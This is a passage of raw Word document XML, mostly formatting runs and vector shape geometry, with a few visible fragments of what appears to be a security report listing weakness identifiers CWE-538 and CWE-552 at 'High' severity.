          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-538</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-552</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368408C3" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="17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Three separate paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250E541" w14:textId="047F974B" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>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7616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="16BBC154" wp14:editId="211012E1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>17780</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>217863</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6480126" cy="2286000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28769" name="Group 28769"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="2286000"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="2286000"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1429" name="Shape 1429"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1439"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709329"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712912"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713879"/>
                                  <a:pt x="6470001" y="714363"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714363"/>
                                  <a:pt x="14094" y="713879"/>
                                  <a:pt x="11760" y="712912"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711938"/>
                                  <a:pt x="7366" y="710561"/>
                                  <a:pt x="5580" y="708782"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="706989"/>
                                  <a:pt x="2417" y="704931"/>
                                  <a:pt x="1450" y="702599"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11745"/>
                                </a:ln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439" name="Shape 1439"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="104775" y="847725"/>
                            <a:ext cx="990600" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="990600" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="983705" y="0"/>
                                  <a:pt x="985950" y="930"/>
                                  <a:pt x="987810" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="989670" y="4651"/>
                                  <a:pt x="990600" y="6890"/>
                                  <a:pt x="990600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="990600" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="990600" y="126448"/>
                                  <a:pt x="989670" y="128687"/>
                                  <a:pt x="987810" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="985950" y="132407"/>
                                  <a:pt x="983705" y="133338"/>
                                  <a:pt x="98107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42" name="Shape 1442"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1019175"/>
                            <a:ext cx="809625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="809625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="800100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="802730" y="0"/>
                                  <a:pt x="804975" y="930"/>
                                  <a:pt x="806835" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="808695" y="4638"/>
                                  <a:pt x="809625" y="6890"/>
                                  <a:pt x="809625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="809625" y="135979"/>
                                  <a:pt x="808695" y="138224"/>
                                  <a:pt x="806835" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="804975" y="141932"/>
                                  <a:pt x="802730" y="142863"/>
                                  <a:pt x="800100" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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45" name="Shape 1445"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2714625" y="1019175"/>
                            <a:ext cx="1162050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155156" y="0"/>
                                  <a:pt x="1157400" y="930"/>
                                  <a:pt x="1159260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4638"/>
                                  <a:pt x="1162050" y="6890"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1162050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="135979"/>
                                  <a:pt x="1161120" y="138224"/>
                                  <a:pt x="1159260" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157400" y="141932"/>
                                  <a:pt x="1155156" y="142863"/>
                                  <a:pt x="1152525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>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51" name="Shape 1451"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2762250" y="1457325"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500"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54" name="Shape 1454"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3600450" y="1457325"/>
                            <a:ext cx="581025" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4638"/>
                                  <a:pt x="581025" y="6890"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="126454"/>
                                  <a:pt x="580095" y="128699"/>
                                  <a:pt x="578235" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="132420"/>
                                  <a:pt x="574130" y="133350"/>
                                  <a:pt x="571500"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57" name="Shape 1457"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5162549" y="1457325"/>
                            <a:ext cx="457201" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457201" h="133350">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447676" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450306" y="0"/>
                                  <a:pt x="452551" y="930"/>
                                  <a:pt x="454411" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456271" y="4638"/>
                                  <a:pt x="457200" y="6890"/>
                                  <a:pt x="457201" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457201" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="126454"/>
                                  <a:pt x="456271" y="128699"/>
                                  <a:pt x="454411" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452551" y="132420"/>
                                  <a:pt x="450306" y="133350"/>
                                  <a:pt x="447676" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="1" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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64" name="Shape 1464"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4457700" y="1800225"/>
                            <a:ext cx="2000250" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2000250" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2000250" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000250" y="133350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="133338"/>
                                  <a:pt x="4649" y="132407"/>
                                  <a:pt x="2789" y="130547"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123826"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2789" y="2778"/>
                                </a:ln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66" name="Shape 1466"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1971675"/>
                            <a:ext cx="85725" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="85725" h="142875">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="78830" y="0"/>
                                  <a:pt x="81075" y="930"/>
                                  <a:pt x="82935" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="84795" y="4638"/>
                                  <a:pt x="85725" y="6890"/>
                                  <a:pt x="85725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="85725" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="85725" y="135979"/>
                                  <a:pt x="84795" y="138224"/>
                                  <a:pt x="82935" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="81075" y="141945"/>
                                  <a:pt x="78830" y="142875"/>
                                  <a:pt x="76200" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="142875"/>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71" name="Shape 1471"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2447925" y="1971675"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4638"/>
                                  <a:pt x="342900" y="6890"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="135979"/>
                                  <a:pt x="341970" y="138224"/>
                                  <a:pt x="340110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="141945"/>
                                  <a:pt x="336005" y="142875"/>
                                  <a:pt x="33337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74" name="Shape 1474"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3638550" y="1971675"/>
                            <a:ext cx="457200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450305" y="0"/>
                                  <a:pt x="452550" y="930"/>
                                  <a:pt x="454410" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456270" y="4638"/>
                                  <a:pt x="457200" y="6890"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="135979"/>
                                  <a:pt x="456270" y="138224"/>
                                  <a:pt x="454410" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452550" y="141945"/>
                                  <a:pt x="450305" y="142875"/>
                                  <a:pt x="447675" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4649" y="141945"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>
                                  <a:pt x="929" y="4638"/>
                                  <a:pt x="2789" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4649"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77" name="Shape 1477"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5391149" y="1971675"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9526" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="930"/>
                                  <a:pt x="863985" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865844" y="4638"/>
                                  <a:pt x="866775" y="6890"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135979"/>
                                  <a:pt x="865844" y="138224"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141945"/>
                                  <a:pt x="859880" y="142875"/>
                                  <a:pt x="857250" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9526" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="1" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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80" name="Shape 1480"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="2143125"/>
                            <a:ext cx="1514475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507580" y="0"/>
                                  <a:pt x="1509825" y="930"/>
                                  <a:pt x="1511685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513545" y="4638"/>
                                  <a:pt x="1514475" y="6890"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="135973"/>
                                  <a:pt x="1513545" y="138212"/>
                                  <a:pt x="1511685" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509825" y="141932"/>
                                  <a:pt x="1507580" y="142863"/>
                                  <a:pt x="1504950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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83" name="Shape 1483"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1581150" y="2143125"/>
                            <a:ext cx="1333500" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1333500" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1323975" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1326605" y="0"/>
                                  <a:pt x="1328850" y="930"/>
                                  <a:pt x="1330710" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1332570" y="4638"/>
                                  <a:pt x="1333499" y="6890"/>
                                  <a:pt x="1333500" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1333500" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1333499" y="135973"/>
                                  <a:pt x="1332570" y="138212"/>
                                  <a:pt x="1330710" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1328850" y="141932"/>
                                  <a:pt x="1326605" y="142863"/>
                                  <a:pt x="1323975"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86" name="Shape 1486"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2981324" y="2143125"/>
                            <a:ext cx="457200" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="457200" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="447675" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="450306" y="0"/>
                                  <a:pt x="452551" y="930"/>
                                  <a:pt x="454411" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="456271" y="4638"/>
                                  <a:pt x="457200" y="6890"/>
                                  <a:pt x="457200" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="457200" y="135973"/>
                                  <a:pt x="456271" y="138212"/>
                                  <a:pt x="454411" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="452551" y="141932"/>
                                  <a:pt x="450306" y="142863"/>
                                  <a:pt x="447675"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489" name="Shape 1489"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3505200" y="2143125"/>
                            <a:ext cx="466725" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="930"/>
                                  <a:pt x="463935" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4638"/>
                                  <a:pt x="466725" y="6890"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="135973"/>
                                  <a:pt x="465795" y="138212"/>
                                  <a:pt x="463935" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="141932"/>
                                  <a:pt x="459830" y="142863"/>
